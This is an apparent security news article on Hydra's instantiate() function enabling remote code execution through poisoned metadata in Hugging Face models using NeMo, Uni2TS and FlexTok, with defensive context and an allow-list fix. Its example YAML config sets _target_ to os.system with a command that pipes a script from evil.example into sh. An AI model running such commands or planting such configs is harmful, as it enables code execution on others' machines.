
Hydra Dependency Creates Systemic AI Security Risk Across Hugging Face Models

Open Source AI Supply Chain Exposed As Hydra Flaw Enables Poisoned Metadata Attacks Across Hugging Face Models

Critical flaws in widely used open-source AI libraries from Nvidia, Salesforce, and Apple expose Hugging Face models to remote code execution via poisoned metadata, highlighting growing supply chain risks in shared AI tooling.

Critical security vulnerabilities have been uncovered in widely used open-source Python AI and machine learning libraries powering Hugging Face models, enabling remote code execution (RCE) through poisoned metadata embedded in model files.

The affected libraries include NeMo from Nvidia, Uni2TS from Salesforce, and FlexTok, developed by Apple in collaboration with EPFL’s Visual Intelligence and Learning Lab. All three rely on Hydra, an open-source configuration management library maintained by Meta. The flaw stems from Hydra’s hydra.utils.instantiate() function, which can execute any callable specified in configuration metadata, not just class constructors.
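
The mechanism is easiest to see in a minimal sketch of Hydra's documented instantiate() behaviour. The config values below are invented for illustration; only the _target_/_args_ convention comes from Hydra itself:

```python
from hydra.utils import instantiate

# Intended use: _target_ names a class to construct,
# and the remaining keys become constructor kwargs.
safe_cfg = {"_target_": "datetime.timedelta", "seconds": 30}
print(instantiate(safe_cfg))  # -> 0:00:30

# The weakness: _target_ may point at ANY importable callable,
# not just a constructor. Attacker-controlled metadata could
# name os.system instead of a model class.
unsafe_cfg = {"_target_": "os.system", "_args_": ["echo proof-of-concept"]}
# instantiate(unsafe_cfg)  # would run the shell command if uncommented
```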

Attackers could exploit this behaviour by publishing modified models containing malicious metadata. When such models are loaded, the poisoned metadata can trigger functions such as eval() or os.system(), allowing arbitrary code execution.
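
A hypothetical poisoned config file shows what that attack path could look like. The YAML keys and shell command here are invented; the pattern simply mirrors how a library might feed repository metadata straight into instantiate():

```python
from omegaconf import OmegaConf
from hydra.utils import instantiate  # the call a trusting loader would make

# Hypothetical metadata as it might ship inside a model repository.
poisoned_yaml = """
model:
  _target_: os.system              # attacker swaps in an arbitrary callable
  _args_: ["curl https://evil.example/payload.sh | sh"]
"""
cfg = OmegaConf.create(poisoned_yaml)

# A loader that trusts this file and calls instantiate(cfg.model)
# would execute the shell command on the machine loading the model.
```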
The vulnerabilities were discovered by Palo Alto Networks’ Unit 42 threat research team and responsibly disclosed to maintainers. Fixes, advisories, and CVEs have since been issued, and no confirmed in-the-wild exploitation has been observed so far.

According to Unit 42 malware research engineer Curtis Carmony, “Attackers would just need to create a modification of an existing popular model, with either a real or claimed benefit, and then add malicious metadata.” He added that while formats such as safetensors may appear secure, “there is a very large attack surface in the code that consumes them.”

The issue highlights a broader open-source AI supply chain risk. Hugging Face models collectively depend on more than 100 Python libraries, nearly half of which use Hydra, creating systemic exposure across the ecosystem. While Meta has updated Hydra’s documentation to warn about RCE risks, a recommended block-list mechanism has yet to be released, underscoring ongoing challenges in securing shared open-source AI infrastructure.
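
Pending an upstream control, one defensive pattern is to validate _target_ against an explicit allow-list before delegating to instantiate(). This is an illustrative sketch, not Meta's planned mechanism, and the allow-list entries are hypothetical:

```python
from hydra.utils import instantiate

# Illustrative allow-list wrapper; entries are example project choices.
ALLOWED_TARGETS = {
    "torch.optim.Adam",
    "datetime.timedelta",
}

def safe_instantiate(cfg):
    """Instantiate only configs whose _target_ is explicitly trusted."""
    target = cfg.get("_target_")
    if target not in ALLOWED_TARGETS:
        raise ValueError(f"refusing untrusted _target_: {target!r}")
    return instantiate(cfg)

print(safe_instantiate({"_target_": "datetime.timedelta", "seconds": 5}))
# safe_instantiate({"_target_": "os.system", "_args_": ["id"]})  # raises ValueError
```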
